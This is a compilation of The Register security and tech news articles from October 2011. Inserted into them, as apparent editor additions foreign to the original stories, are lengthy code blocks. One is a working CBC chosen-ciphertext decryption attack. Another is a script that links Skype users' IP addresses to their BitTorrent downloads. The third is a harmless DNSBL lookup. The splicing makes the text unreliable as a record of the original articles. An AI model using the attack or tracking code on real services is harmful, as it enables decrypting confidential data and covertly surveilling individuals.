STE WILLIAMS

Privacy blunders by UK biz soar, websites least trusted

Data security breaches within the private sector are rapidly increasing, the UK’s Information Commissioner warned today.

Information Commissioner Christopher Graham said that the number of such violations reported to the ICO was up 58 per cent so far in 2011/12, compared with the same period last year.

The watchdog revealed those findings following a survey of 2,500 UK-based individuals and 800 businesses.

The survey uncovered, unsurprisingly, a disconnect between the private sector’s greater understanding of its data protection responsibilities and a drop in public confidence in how such information is handled.

“I’m encouraged that the private sector is waking up to its data protection responsibilities, with unprompted awareness of the [Data Protection] Act’s principles higher than ever,” said Graham.

“However, the sector does not seem to be putting its knowledge to good use. The fact is that security breaches in the private sector are on the rise, and public confidence in good information handling is declining.”

He reminded businesses that a fine of up to £500,000 could be slapped on companies that fail to comply with the Data Protection Act.

Graham also pointed out that a brand’s reputation could be damaged “when data is not handled properly”.

The ICO, in its report, pinpointed web-based outfits as the area where public concern about personal data was highest. It said “almost three-quarters of individuals believe that online companies are not keeping their details secure”. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/ico_public_secotr_data_breaches/

Smartphone black market fuels knife robberies

The Association of Chief Police Officers (ACPO) reckons demand for smartphones on the black market has in part fuelled a rise in knife robberies.

According to a study of crime reports in the UK, police forces in England and Wales recorded nearly 15,000 robberies at knifepoint in the year to June, up 7 per cent on the previous year, as total crime levels fell 4 per cent to 4.1 million incidents.

The numbers were broken down by the Home Office yesterday, showing that 29 per cent of all thefts reported involved mobile handsets, up from, er, 28 per cent in the previous 12 months.

But just 3 per cent of theft was related to computers or other electrical goods, down from five per cent to June 2010.

“The increase in robbery and robbery with knives is a cause for concern,” said Merseyside chief constable Jon Murphy. “We believe this is in part driven by demand for mobile phone handsets, which can fetch more than double their worth on the black market abroad.”

“Worryingly, a large proportion of phone owners still do not have passcodes on their phones, leaving them vulnerable to possible ID theft and fraud,” he added.

Recent research by paper-shredding equipment supplier Fellowes states that 7 per cent of Britons, four million folk, had been victims of identity fraud at some point.

Fraud prevention service CIFAS claimed that 80,000 people have been targets this year, with ID theft costing on average £1,190 – though in severe cases it had risen to £9,000.

Action Fraud, the national fraud reporting and advice centre, estimated that £245,000 worth of loss in September was due to ID theft.

Jamey Johnson, head of Action Fraud, said: “It is important to report a loss to Action Fraud, but it is more important to protect yourself from it happening in the first place. Limiting access to your personal information is the key to safety from ID fraud.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/knife_crime_smartphones/

Web block would ‘spark arms race’ against pirates

“Communications systems are inherently designed to deliver communication,” stated Mita Mitra, BT’s Internet Policy overseer, yesterday while debating one of the most controversial aspects of the 2010 Digital Economy Act: that BT and other ISPs should be responsible for blocking websites that infringe copyright.

“It’s a big thing, technically, philosophically, for us to stop people accessing sites… it’s quite a significant engineering and technical issue to focus your efforts on effective blocking,” said Mitra at the Westminster eForum on the Act yesterday.

BT and fellow internet service provider TalkTalk are dragging the Digital Economy Act through a judicial review in an attempt to delay its implementation. The case continues; criticism of the Act has been heavy, and the government appears to have backed away from URL blocking, though it is seeking alternatives.

Mitra also stated that stopping casual copyright infringers and hardcore infringers required quite different approaches: “There’s a difference between building stops in a system for those who are deliberate compared to those who didn’t realise that they were going to do it.”

Blocking aside, she also argued that it was very difficult for ISPs to judge whether copyright really had been infringed or not, stating BT’s view that this was a matter for the judiciary, not a telecoms company.

And, she stressed, all this faffing around with blocking would cost ISPs a lot of money and time, resulting in a price hike for normal, non-piratey broadband customers.

Wrong tool for the job

Other objections to website blocking, raised by Consumer Focus policy advisor Saskia Walzel and other speakers, included the contention that blocking is a crude tool that could take down innocent websites and did not always catch offenders. Walzel stated that not only would blocking push up prices for consumers, but that, as a technical side-effect, it would also degrade the network, giving them a worse service.

And LSE academic Dr Bingchun Meng used the example of the Great Firewall in China to suggest that site blocking would likely spark a technical “arms race”, as determined pirates or copyright infringers would quickly adopt other technologies, such as VPNs, to circumvent bans. The battle with the hardcore infringers would only escalate, as ISPs would have to find new technologies to counter the new technologies of the pirates.

The Ofcom chief responsible for internet policy, Campbell Cowie, said the regulator had reached a similar conclusion. The answer to preventing online copyright infringement had to come from behaviour change rather than a technical solution:

It’s not about technology, technology can always be circumvented. It’s about incentives. We put the technologists back in the box and started to look at why people do it. It’s about how you change the incentive structure; it’s not a technological thing.

There were several dissenting voices.

An audience member from Warner Brothers argued that just because it was hard to enforce the law didn’t mean you shouldn’t try to enforce it. And a partner in law firm Wiggin, which is representing the film industry in a case against subscription download site NewsBinz, said that the responsibility did lie with ISPs because they were best placed to enforce the blocks. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/website_blocking/

Feds: Cyberpunks spied on Nasdaq directors

The same hackers who cracked into Nasdaq’s computer systems last year apparently planted malware that allowed them to spy on publicly traded companies.

The stock exchange previously said neither its trading systems nor its customer data were exposed by an attack that focused on a web-based app called Directors Desk. However, an investigation into the breach involving the FBI and National Security Agency has found evidence that the hackers extracted data via Directors Desk, including confidential documents and the communications of board directors shared through the system.

Tom Kellermann, chief technology officer at security tools firm AirPatrol, told Reuters that hackers had spied on “scores” of directors who used directorsdesk.com before backdoor spyware was found and removed. The breach was detected in October. It is still unclear how long Nasdaq’s system had been compromised before that.

Nasdaq chief Robert Greifeld said the exchange spends nearly $1bn a year defending itself against constant hacking attacks. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/nasdaq_hackers_malware_plot_uncovered/

Boffins crack e-commerce encryption

German computer scientists have cracked components of an encryption system used to securely exchange data between e-commerce and banking systems.

Boffins from the Ruhr University of Bochum (RUB) have devised a chosen-ciphertext technique: carefully modified ciphertext is submitted to a web service and the error messages it returns are analysed. By observing the responses to a sequence of such submissions, it is possible to decrypt XML-encrypted data elements without knowing the key, H Security reports.

The official W3C XML Encryption specification is designed to allow the secure transmission of information between different e-commerce and financial systems. The attack applies where the data is encrypted with AES in cipher-block chaining (CBC) mode; other techniques, such as using an RSA key and X.509 certificates, are not susceptible. The underlying problem is that CBC mode on its own gives no integrity protection: an attacker can flip bits in a plaintext block by flipping the corresponding bits in the preceding ciphertext block, and any observable difference in how the recipient handles the resulting malformed XML becomes a decryption oracle.
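The mechanics behind that description, as an added example that is not the RUB researchers’ code: a chosen-ciphertext attack that recovers CBC-encrypted data from nothing but a decryptor’s accept/reject answers. Assumptions made here: a toy Feistel network stands in for AES (the attack depends only on CBC’s XOR chaining, so the block cipher is irrelevant); padding follows XML Encryption’s scheme (random filler, last byte gives the pad length, 1 to 16); the service’s XML parser is modelled as rejecting any control or non-ASCII character in the decrypted text; and the query strategy, which first finds the pad byte and then walks the block one character at a time, is the editor’s own rather than the one in the paper.

```python
"""Chosen-ciphertext decryption of CBC mode from a decryptor's accept/reject
behaviour.  Added example, not the RUB paper's code.  Toy Feistel cipher in
place of AES (assumption); XML Encryption padding; ASCII-text parser model."""
import hashlib
import os

BLOCK = 16
VALID = set(b"\t\n\r") | set(range(0x20, 0x7F))  # bytes the "XML parser" accepts

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:  # 8-round Feistel, 16-byte blocks
    left, right = block[:8], block[8:]
    for rnd in range(8):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(8)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK            # XML Encryption padding:
    padded = plaintext + os.urandom(n - 1) + bytes([n])  # random filler, length last
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    n = out[-1]
    if not 1 <= n <= BLOCK:
        raise ValueError("bad padding")
    return out[:-n]

def make_oracle(key: bytes):
    """The web service as the attacker sees it: decrypt, parse, accept or reject."""
    def accepts(iv: bytes, ct: bytes) -> bool:
        try:
            body = cbc_decrypt(key, iv, ct)
        except ValueError:
            return False
        return all(b in VALID for b in body)
    return accepts

def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block by submitting (chosen IV, target) pairs."""
    y = [0] * BLOCK  # y = D_key(target); the plaintext is y XOR prev
    # Step 1: find the IV byte that yields pad length 16, the only pad length
    # for which the parser inspects no characters, so byte 0 of the IV can
    # take all 256 values without a rejection.  That pins down y[15].
    for x in range(256):
        iv = bytes(BLOCK - 1) + bytes([x])
        if oracle(iv, target) and all(
                oracle(bytes([t]) + iv[1:], target) for t in range(256)):
            y[-1] = x ^ BLOCK
            break
    # Step 2: shrink the pad by one byte per round so byte j becomes the newest
    # byte the parser inspects; accept/reject then says whether y[j] ^ x is a
    # valid character, and 256 such answers identify y[j].  Known bytes are
    # pinned to 'A' so they never cause a rejection themselves.
    for j in range(BLOCK - 1):
        iv = bytearray(BLOCK)
        iv[-1] = y[-1] ^ (BLOCK - 1 - j)
        for k in range(j):
            iv[k] = y[k] ^ 0x41
        cands = set(range(256))
        for x in range(256):
            iv[j] = x
            ok = oracle(bytes(iv), target)
            cands = {c for c in cands if ((c ^ x) in VALID) == ok}
            if len(cands) == 1:
                break
        y[j] = cands.pop()
    return _xor(bytes(y), prev)

def attack(oracle, iv: bytes, ct: bytes) -> bytes:
    """Recover and unpad the whole message from (iv, ct) without the key."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                  for i in range(1, len(blocks)))
    return pt[:-pt[-1]]

if __name__ == "__main__":
    key, iv = os.urandom(16), os.urandom(16)
    secret = b"<Order><Card>4111111111111111</Card></Order>"  # constructed sample
    print(attack(make_oracle(key), iv, cbc_encrypt(key, iv, secret)))
```

Nothing in `recover_block` touches the key; it is driven entirely by the `oracle` function, and swapping the toy cipher for real AES changes nothing about it. That is why the remedy is a change of mode (authenticated encryption) or of the recipient’s error behaviour, not a stronger cipher.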

The cryptoboffins argue their research shows the standard is insecure and needs to be updated. The researchers, Juraj Somorovsky and Tibor Jager, plan to present their research at the ACM Conference on Computer and Communications Security (ACM CCS 2011) in Chicago.

IBM, Microsoft and Red Hat use the technology in various web services products. Each has been notified by the RUB team of its findings (summarised in German here). ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/xml_crypto_cracked/

Dowler family bags £2m payout over phone-hacking saga

News Corp has agreed to cough up £2m to the family of Milly Dowler after individuals working for the now-defunct Sunday tabloid the News of the World were found to have hacked into the murdered schoolgirl’s phone.

News International, owned by Rupert Murdoch’s News Corp, confirmed the settlement in a joint statement with the Dowler family.

Additionally, Murdoch has agreed to donate £1m to a variety of charities selected by the Dowlers.

“The behavior that the News of the World exhibited towards the Dowlers was abhorrent and I hope this donation underscores my regret for the company’s role in this awful event,” said the media tycoon, whose empire has been rocked by the scandal.

The 168-year-old NotW was dramatically axed in July this year, after evidence showed that reporters had accessed Milly Dowler’s voicemail following her disappearance in 2002.

“Nothing that has been agreed will ever bring back Milly or undo the traumas of her disappearance and the horrendous murder trial earlier this year,” the Dowler family said in a statement.

“The only way that a fitting tribute could be agreed was to ensure that a very substantial donation to charity was made in Milly’s memory. We hope that projects will be undertaken so that some good can come from this.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/milly_dowler_family_settlement/

Skype lets hackers track your BitTorrent downloads

Scientists have devised a stealthy and low-cost way to track the internet protocol addresses of tens of thousands of Skype users, and link the information to their online activities such as the sharing of specific files over BitTorrent.

The method, which is laid out in a recently published academic paper, works even when Skype users have configured their accounts to accept calls only from people in their contact lists. It also works against Skype users who aren’t currently logged in, as long as they’ve used the VoIP program in the past three days. The system is able to link an individual Skype user to specific BitTorrent activity, even when they share the IP address with others over a local area network that uses NAT, or network address translation.

“We have shown that it is possible for an attacker, with modest resources, to determine the current IP address of identified and targeted Skype user[s] (if the user is currently active),” the 14-page paper stated. “In the case of Skype, even if the targeted user is behind a NAT, the attacker can determine the user’s public IP address. Such an attack could be used for many malicious purposes, including observing a person’s mobility or linking the identity of a person to his internet usage.”

The scientists found that it was relatively easy to find the ID of most Skype users when their email address and birth name are known to the attacker. Additional information, such as the target’s city of residence, sex, or age, brought greater accuracy to the task.

They then called the target’s Skype account using a customised system that sent specially crafted packets. By examining the headers of the data that came back, they had no trouble determining the person’s IP address. Because the scientists prevented the TCP (transmission control protocol) connection from being fully established during the probing, targets had no idea their Skype accounts were being tracked. The scientists devised the system so that it could track 10,000 people for about $500 per week.

After learning the IP addresses of individuals, the scientists tapped BitTorrent sites to track the specific downloads of addresses in their database. Even when one of the IP addresses was shared among many users on a single network, the method was able to link a single Skype user to a specific download by, among other things, collecting identifiers known as infohashes from BitTorrent networks.
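One way the last step, joining IP addresses learned from Skype to peers observed on a tracker, can be done, as an added example that is not the researchers’ code. Everything in it is constructed for the demonstration: the announce response (assumed to use the compact peer encoding of BEP 23, four bytes of IPv4 address and a two-byte big-endian port per peer, with the dictionary form also handled), the infohash placeholder, and the Skype-to-IP table. Where several Skype users resolve to one public address, the join reports all of them rather than guessing; the paper’s additional step for telling NAT-sharing users apart is not reproduced here.

```python
"""Join tracker-observed BitTorrent peers to identities already resolved to an
IP by another channel (here, the Skype probe).  Added example, not the paper's
code; the announce response, infohash and Skype table are all constructed."""
import ipaddress
import struct

def bdecode(data: bytes, i: int = 0):
    """Minimal bencode decoder; returns (value, index just after the value)."""
    c = data[i:i + 1]
    if c == b"i":                          # integer: i<digits>e
        end = data.index(b"e", i)
        return int(data[i + 1:end]), end + 1
    if c in (b"l", b"d"):                  # list / dict, both terminated by e
        items, i = [], i + 1
        while data[i:i + 1] != b"e":
            v, i = bdecode(data, i)
            items.append(v)
        if c == b"l":
            return items, i + 1
        return dict(zip(items[0::2], items[1::2])), i + 1
    colon = data.index(b":", i)            # byte string: <len>:<bytes>
    n = int(data[i:colon])
    return data[colon + 1:colon + 1 + n], colon + 1 + n

def peers_from_announce(response: bytes):
    """Return [(ip, port)] from a tracker announce response, accepting both
    the compact BEP 23 blob and the older list-of-dicts form."""
    doc, _ = bdecode(response)
    peers = doc.get(b"peers", b"")
    if isinstance(peers, list):
        return [(p[b"ip"].decode(), p[b"port"]) for p in peers]
    out = []
    for off in range(0, len(peers) - len(peers) % 6, 6):   # ignore a trailing partial entry
        ip = str(ipaddress.IPv4Address(peers[off:off + 4]))
        (port,) = struct.unpack("!H", peers[off + 4:off + 6])
        out.append((ip, port))
    return out

def correlate(skype_ips: dict, sightings: dict) -> dict:
    """skype_ips: {skype_id: public_ip} as learned from the Skype probe.
    sightings:  {infohash_hex: announce response bytes} from tracker queries.
    Returns {infohash: {ip: [skype_ids]}}.  More than one id behind an IP means
    the address is shared (NAT) and this join alone cannot name the downloader."""
    by_ip = {}
    for sid, ip in skype_ips.items():
        by_ip.setdefault(ip, []).append(sid)
    hits = {}
    for infohash, response in sightings.items():
        for ip, _port in peers_from_announce(response):
            if ip in by_ip:
                hits.setdefault(infohash, {})[ip] = sorted(by_ip[ip])
    return hits

def sample_announce() -> bytes:
    """A constructed compact-form announce response with three peers."""
    peers = b"".join(ipaddress.IPv4Address(ip).packed + struct.pack("!H", port)
                     for ip, port in [("203.0.113.7", 6881),
                                      ("198.51.100.20", 51413),
                                      ("192.0.2.9", 6889)])
    return b"d8:intervali1800e5:peers" + str(len(peers)).encode() + b":" + peers + b"e"

SAMPLE_SKYPE_IPS = {"alice": "203.0.113.7", "bob": "198.51.100.20",
                    "carol": "198.51.100.20"}   # constructed; bob and carol share a NAT
SAMPLE_INFOHASH = "ab" * 20                      # constructed placeholder, not a real torrent

if __name__ == "__main__":
    print(correlate(SAMPLE_SKYPE_IPS, {SAMPLE_INFOHASH: sample_announce()}))
```

The peer at 192.0.2.9 is dropped because no Skype identity resolved to it; the shared address comes back with both names, which is the honest answer for a tracker-side join on its own.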

The scientists said Google Talk, MSN Live and other real-time communication applications may also be susceptible to the technique, but they singled Skype out for containing what they called “a major privacy vulnerability.”

In a statement, Adrian Asher, chief information security officer in Microsoft’s Skype division, said: “We value the privacy of our users and are committed to making our products as secure as possible. Just as with typical internet communications software, Skype users who are connected may be able to determine each other’s IP address. Through research and development, we will continue to make advances in this area and improvements to our software.”

The research paper, which is titled I Know Where You are and What You are Sharing, made several recommendations for improving Skype’s ability to conceal the identity of its users.

“One solution that would go a long way is to design the VoIP system so that the callee’s IP address is not revealed until the user accepts the call,” it stated. “With this property, Alice would not be able to inconspicuously call Bob. Moreover, if Alice is a stranger (that is, not on Bob’s contact list), and Bob configures his client to not accept calls from strangers, then this design would prevent any stranger from tracking him, conspicuously or otherwise.”

A PDF of the paper is here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/skype_bittorrent_stalking/

Bug in Flash Player allowed Mac webcam spying

Updated Engineers on Thursday patched a hole in Adobe’s ubiquitous Flash Player that allowed website operators to silently eavesdrop on visitors’ webcam and microphone feeds without permission.

To be attacked, visitors needed to do no more than visit a malicious website and click on a handful of buttons like the ones in this live demonstration. Without warning, the visitor’s camera and microphone were activated and the video and audio intercepted. The attack closely resembled a separate Flash-based attack on webcams from 2008 using a class of exploit known as clickjacking.

Adobe said on Thursday it was planning to fix the vulnerability, which stems from flaws in the Flash Player Settings Manager. The panel, used to designate which sites may access feeds from an end user’s camera and mic, is delivered in the SWF format used by Flash. Feross Aboukhadijeh, a computer science student at Stanford University, discovered he could embed the SWF file in an invisible iframe and superimpose misleading graphics on top that tricked visitors into making changes to the underlying privacy settings.

“I’ve seen a bunch of clickjacking attacks in the wild, but I’ve never seen any attacks where the attacker iframes a SWF file from a remote domain to clickjack it – let alone a SWF file as important as one that controls access to your webcam and mic!” Aboukhadijeh wrote in a blog post.

Because the settings manager is hosted on Adobe’s servers, engineers were able to close the hole without updating end-user software, company spokeswoman Wiebke Lips said. The change was pushed out early in the afternoon on Thursday, two days after Aboukhadijeh published his findings.

Shortly after security researchers Jeremiah Grossman and Robert “RSnake” Hansen documented clickjacking in 2008, Adobe patched Flash to blunt attacks that exploited the program to surreptitiously spy on the millions of people who use it. Engineers closed the hole by changing the behaviour of the Flash security dialog box when it is set to be transparent.

Aboukhadijeh was able to revive the attack by exploiting the settings manager, which until Thursday’s fix, still allowed important settings to be made while it was in transparent mode.

He said his demonstration worked only against Macs when using Firefox or Safari, and that a CSS opacity bug prevented it from working on other operating systems and browsers. It wouldn’t have been surprising if additional research uncovered ways to make the attack more universal.

Aboukhadijeh went on to say he went public after reporting the vulnerability to Adobe and getting no reply.

“It’s been a few weeks and I haven’t heard anything from Adobe yet,” he said. “I think it’s worth sharing it with the world now, so that Adobe pays attention and fixes it more quickly.” ®

This article was updated throughout to reflect that Adobe has issued a patch.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/20/acobe_flash_webcam_spying/

Gaddafi death reports likely to spawn multiple scams

Early reports that deposed Libyan dictator Muammar Gaddafi may have died after being injured during the fall of his home town of Sirte are likely to become a theme of cybercrime attacks, if past experience is anything to go by.

The execution of Saddam Hussein in 2006, like the hoax reports of Osama Bin Laden’s capture that circulated in 2005, six years before he was actually killed, was accompanied by spam emails falsely offering “death pictures” in attachments. The attachments had actually been loaded with malware. Scams along the same lines featuring supposed images of Gaddafi are almost inevitable.

Other scams likely to rear their heads include attempts to poison search results for terms related to Gaddafi’s demise, so that sites punting scareware appear prominently. Such blackhat search engine manipulation also follows in the wake of natural disasters. In Gaddafi’s case at least, fake donation website scams are unlikely to appear and still less likely to pull in any victims.

Supposed photo sets of Gaddafi are also likely to appear on Facebook as a lure designed to con marks into completing time-wasting surveys, and perhaps to further trick them into signing up to useless premium-rate text messaging services.

Finally, 419 advance fee frauds featuring rewards beyond the dreams of avarice in exchange for help in siphoning Gaddafi’s millions out of Libya or from banks in third-party countries are another possibility.

Let’s be careful out there. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/20/gaddafi_scams/

Spamhaus and ISP spar over ’email DoS’ blacklisting

Analysis Spamhaus and a Dutch ISP that was temporarily slapped on the anti-spam organisation’s blacklist continue to be at loggerheads – even after the service provider was removed from the list.

The row between A2B and Spamhaus came after the Dutch ISP allegedly provided connectivity services to CB3ROB (AKA Cyberbunker), an outfit long identified by Spamhaus as a rogue host and included on its Spamhaus Block List (SBL) – which is used by email providers to weed out spam.

Cyberbunker offers anonymous hosting of anything “except child porn and anything related to terrorism”, as its terms and conditions proudly proclaim. This almost ‘anything goes’ policy means spam, phishing-site and malware hosting are tolerated.

According to Spamhaus, Cyberbunker has long been a haven for cybercrime and spam. Cyberbunker itself does not respond to complaints. Spamhaus deals with this common situation by adding rogue hosts to its SBL and contacting upstream providers to encourage them to kick bad actors off their network.

After Spamhaus had notified A2B several times since June about Cyberbunker without result, one of A2B’s IP ranges was added to the Spamhaus Block List’s “providing a spam support service” category. Until Spamhaus finally escalated the SBL listing on 6 October, A2B Internet was also providing connectivity to a China-based rogue host whose businesses include selling counterfeit watches advertised via spam, according to Spamhaus.

The Spamhaus Project tracks email spammers and spam-related activity. It supplies DNS-based block lists that many ISPs query to reject mail from known spammers. A2B was on this list for around two days, until it stopped handling traffic for Cyberbunker, which is still online but connected via another provider.
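How a receiving mail server actually consults the SBL, and what a range listing does to every address inside it, as an added example that is not Spamhaus or A2B code. The resolver is a constructed stand-in (an assumption, so the block runs offline) that answers for the /21 Linford later says was listed; the zone name and the 127.0.0.2 answer follow the SBL’s published conventions. The last function is the check an upstream would run to see which of its own customers a listing takes down.

```python
"""DNSBL lookup as a mail server performs it, plus the collateral-damage check
for a range listing.  Added example, not Spamhaus or A2B code.  The resolver
is a stand-in (assumption) so that the block runs offline."""
import ipaddress

SBL_ZONE = "sbl.spamhaus.org"
LISTED = ipaddress.ip_network("178.249.152.0/21")   # the range Linford names, listed for 48 hours
RETURN_CODES = ipaddress.ip_network("127.0.0.0/8")  # every genuine DNSBL answer lives here

def dnsbl_name(ip: str, zone: str = SBL_ZONE) -> str:
    """178.249.152.1 -> 1.152.249.178.sbl.spamhaus.org (octets reversed, zone appended)."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 listings only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone

def stub_resolver(name: str):
    """Stand-in for an A-record lookup: 127.0.0.2 (the SBL listing code) for any
    address inside LISTED, None for NXDOMAIN.  A real client calls its DNS library."""
    labels = name[: -len("." + SBL_ZONE)].split(".")
    ip = ipaddress.ip_address(".".join(reversed(labels)))
    return "127.0.0.2" if ip in LISTED else None

def is_listed(ip: str, resolve=stub_resolver) -> bool:
    """True only for a well-formed listing answer.  An answer outside 127.0.0.0/8
    means a wildcarded, expired or hijacked zone and must count as 'not listed',
    otherwise one bad zone rejects all inbound mail."""
    answer = resolve(dnsbl_name(ip))
    return answer is not None and ipaddress.ip_address(answer) in RETURN_CODES

def collateral(customer_ips, listed=LISTED):
    """Which of an upstream's own customers lose the ability to send mail to
    SBL-using receivers while the range is listed."""
    return [ip for ip in customer_ips if ipaddress.ip_address(ip) in listed]

if __name__ == "__main__":
    for ip in ("178.249.155.200", "178.249.160.1"):          # constructed sample addresses
        print(ip, dnsbl_name(ip), "listed" if is_listed(ip) else "clean")
    print(collateral(["178.249.152.10", "178.249.159.255", "178.249.160.0"]))
```

The lookup is per connecting client and costs one DNS query, which is why a /21 listing is felt immediately by every host in it regardless of whether that host ever sent spam; the 127.0.0.0/8 check is the guard most MTAs apply so that a misbehaving list cannot turn into a blanket rejection.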

Under pressure

A2B responded to the blacklisting by accusing Spamhaus of acting as internet vigilantes and complaining to the police over alleged extortion. It accuses Spamhaus of placing “disproportionate pressure … upon us to stop routing for a network without legal cause or reason”. It further argues Spamhaus should take up any problem it has with Cyberbunker directly or with the police, not upstream providers.

“The thing is that we are a LIR (Legal Internet Registrant) and we provide transit to other LIRs and ISPs,” Erik Bais, a director at A2B Internet told El Reg.

“If Spamhaus is having an issue with something that CB3ROB is doing, they can either take it up with them or if they don’t want to, take it up with the police.

“We have acted on the provided abuse message after pushing Spamhaus to provide it, and when they stated that blocking one IP address was not enough and they wanted to see CB3ROB completely removed from our network, it shows exactly how detached from reality they are.

“CB3ROB isn’t even a customer of ours, but is rather a customer of Datahouse (who also has their own network and IP addresses) and to move up two ISPs and start complaining there is just insane. On top of that, putting the IPs of that ISP on a blacklist to “make your point” is something I don’t have a good word for.”

Black sheep

Steve Linford, the Spamhaus founder, defended the blacklisting. “We do not need to ‘take it up with the police’ every time we encounter a rogue host or spam host, we very simply add them to the SBL,” Linford told El Reg. “That is what the SBL is for.

“All of CB3ROB has been on the SBL for some time. There has not been a single complaint from any CB3ROB customer about it, because there are no CB3ROB customers that wish to show their heads above ground to complain,” he added.

Linford claimed Bais runs Datahouse, so attempts to push the issue off to that ISP are disingenuous.

Bais countered that Datahouse has outsourced the management of its network to A2B but said that he wasn’t employed by Datahouse.

According to Bais, the blacklisting of a range (but not all) of A2B’s internet addresses meant that a number of the ISP’s customers, including a high street retail chain, were left unable to send email. He compared this to the BlackBerry outage last week.

It is this collateral damage that prompted Bais to file a police complaint against Spamhaus. “I don’t want to put Spamhaus out of business or sue it for money, but I do want it to change its policies, which are unjust,” Bais said. “They are listing innocent addresses that are not involved in spamming. What Spamhaus did felt like extortion. A denial of email service.”

Bais also disputed Spamhaus’s assessment that Cyberbunker is a haven for cybercrime, arguing that it is China-based customers peddling replicas and torrent tracker services, rather than anything more unsavoury, that have led to the complaints Spamhaus is pursuing. He claimed that Cyberbunker would respond to requests to take down botnet command-and-control hubs, for example, and would “look at a valid complaint”.

Linford argued that A2B’s claims on the effect of the temporary blacklisting applied by Spamhaus are exaggerated.

“There was only ever one of A2B’s many IP ranges on the SBL, back on October 6, it was 178.249.152.0/21 and it was only on the SBL for 48 hours. To enlarge his story A2B has been saying that ‘all’ of A2B was on the SBL, which is a lie,” Linford said.

“So the current status is that A2B has no SBL listings, the one they had on October 6 lasted only 48 hours and was only a small part of their IP range – not the ‘all of A2B’ Erik Bais says.

“CB3ROB is still on the SBL and will remain on the SBL for the foreseeable future until we are convinced it would not pose a threat to SBL users to remove it,” Linford added.

Bais told El Reg that A2B had received messages of support from several other ISPs since complaining to Dutch police about Spamhaus. He didn’t say how many ISPs had come out in support of A2B’s stance but suggested that police complaints against Spamhaus by ISPs in the UK and Switzerland may follow.

Out of line

Linford said most ISPs co-operated with Spamhaus and had no problem with its methods. “We always ask upstreams to stop giving transit to rogue hosts once the host is completely SBL’d. All transit providers have Terms of Service which forbid spam and malware from a downstream and require downstreams to handle complaints promptly. A2B is the only transit provider we know of that also doesn’t care what his downstream does.”

Bais said A2B had a “very strict” abuse policy, pointing to favourable listings by independent third-party services to this effect (here and here).

But what about the Dutch police complaint by A2B?

Spamhaus, at least, is confident nothing will come of it. “As was to be expected, we have not heard a peep from any police about the complaint A2B says it filed,” Linford told El Reg.

Both parties have published their radically different take on ongoing events here and here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/20/spamhaus_a2b_row/